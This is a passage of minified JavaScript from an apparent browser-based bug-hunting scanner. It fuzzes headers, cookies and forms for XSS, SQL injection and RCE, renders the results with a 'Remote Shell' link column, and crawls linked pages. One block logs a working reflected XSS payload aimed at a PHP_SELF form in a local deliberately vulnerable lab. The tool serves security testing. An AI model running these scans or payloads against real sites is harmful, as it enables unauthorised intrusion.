data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Headers</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">'+htmlEntities(headers).replace(/(?:\r\n|\r|\n)/g,"<br>")+"</div></div></div>",!0===this.headersFuzzerEnabled){console.log("URL Headers Vulnerabilities".toUpperCase());const headers=await testHeaders.call(this);console.log(headers),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL Headers Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",headers.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"}if(console.log("----------------------------------------------------------------------------"),console.log("\n"),!0===this.xssScanEnabled){console.log("URL XSS Vulnerabilities".toUpperCase());const xss=await testXSS.call(this);console.log(xss),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL XSS Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th></tr>",xss.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("Try to test the possible XSS of PHP_SELF in the form"),console.log("If i have http://localhost/Vulnerable-Web-Application-master/XSS/XSS_level5.php?username=&submit=Submit"),console.log('i can run this payload: http://localhost/Vulnerable-Web-Application-master/XSS/XSS_level5.php/"><script>alert(1)<\/script><span class="bho?username=&submit=Submit'),console.log('and my form from this: <form method="GET" action="<?php echo $_SERVER[\'PHP_SELF\']; ?>" name="form">'),console.log('become this: <form method="GET" action="http://localhost/Vulnerable-Web-Application-master/XSS/XSS_level5.php/"><script>alert(1)<\/script><span class="bho" name="form">'),console.log("----------------------------------------------------------------------------"),console.log("\n")}if(!0===this.sqlInjectionScanEnabled){console.log("URL SQL Injection Vulnerabilities".toUpperCase());const sql=await testSqlInjection.call(this);console.log(sql),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL SQL Injection Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",sql.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td>"+tryRemoteShellLink(v)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")}if(!0===this.rceScanEnabled){console.log("URL RCE Vulnerabilities".toUpperCase());const rce=await testRCE.call(this);console.log(rce),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL RCE Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th></tr>",rce.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")}if(!0===this.formFuzzingEnabled){console.log("Form Vulnerabilities".toUpperCase());const form=await formLoop.call(this);console.log(form),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Form Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",form.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td>"+tryRemoteShellLink(v)+"</td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")}console.log("\n"),console.log("----------------------------------------------------------"),console.log("Created by Davide Cavallini"),console.log("Linkedin: https://www.linkedin.com/in/davidecavallini/"),guiEnabled(gui)},String.prototype.hexEncode=function(){let hex="",result="";for(let i=0;i<this.length;i++)hex=this.charCodeAt(i).toString(16),result+=("000"+hex).slice(-2);return result},String.prototype.replaceLast=function(find,replace){const index=this.lastIndexOf(find);return index>=0?this.substring(0,index)+replace+this.substring(index+find.length):this.toString()},this.manualFuzzer=async function(manualFuzzerUrl,manualFuzzerMethod,manualFuzzerParams){try{const params=Object.entries(JSON.parse(manualFuzzerParams)),originalParamLength=params.length;let result=[];result=result.concat(await fuzzer.call(this,originalParamLength,manualFuzzerUrl,"pageParams",manualFuzzerMethod,params)),result=result.filter(v=>void 0!==v.paramName),console.log(result);let gui="",accordionNumber=0;accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Form Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",result.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>",!0===this.cookiesFuzzerEnabled&&(result=[],result=result.concat(await fuzzer.call(this,originalParamLength,manualFuzzerUrl,"cookiesParams",manualFuzzerMethod,params)),result=result.filter(v=>void 0!==v.paramName),console.log(result),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Cookies Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",result.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"),!0===this.headersFuzzerEnabled&&(result=[],result=result.concat(await fuzzer.call(this,originalParamLength,manualFuzzerUrl,"headersParams",manualFuzzerMethod,params)),result=result.filter(v=>void 0!==v.paramName),console.log(result),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Headers Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",result.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"),guiEnabled(gui)}catch(e){alert(e)}},this.spider=async function(){const initialUrl=document.location.href,urls=[];await recursion(initialUrl,0);let gui='<table style="overflow:auto" class="table table-responsive table-striped table-hover">';return urls.forEach(v=>{gui+='<tr><td><a href="'+v+'" target="_blank">'+v+"</a></td></tr>"}),gui+="</table>",guiEnabled(gui),urls;async function recursion(url,depth){const data=await $.get(url);depth++;for(const tmp of $(data).find("a"))if(void 0!==tmp&&void 0!==tmp.href&&-1===urls.findIndex(element=>element===tmp.href)){urls.push(tmp.href);try{console.log("r",tmp.href),await recursion(tmp.href,depth)}catch(e){}}for(const tmp of $(data).find("script"))if(void 0!==tmp&&void 0!==tmp.src&&-1===urls.findIndex(element=>element===tmp.src)){urls.push(tmp.src);try{console.log("r",tmp.src),await recursion(tmp.src,depth)}catch(e){}}for(const tmp of $(data).find("link"))if(void 0!==tmp&&void 0!==tmp.href&&-1===urls.findIndex(element=>element===tmp.href)){urls.push(tmp.href);try{console.log("r",tmp.href),await recursion(tmp.href,depth)}catch(e){}}for(const tmp of $(data).find("img"))if(void 0!==tmp&&void 0!==tmp.src&&-1===urls.findIndex(element=>element===tmp.src)){urls.push(tmp.src);try{console.log("r",tmp.src),await recursion(tmp.src,depth)}catch(e){}}for(const tmp of $(data).find("iframe"))if(void 0!==tmp&&void 0!==tmp.src&&-1===urls.findIndex(element=>element===tmp.src)){urls.push(tmp.src);try{console.log("r",tmp.src),await recursion(tmp.src,depth)}catch(e){}}}}}var jBHH=new JsBugHuntingHelper;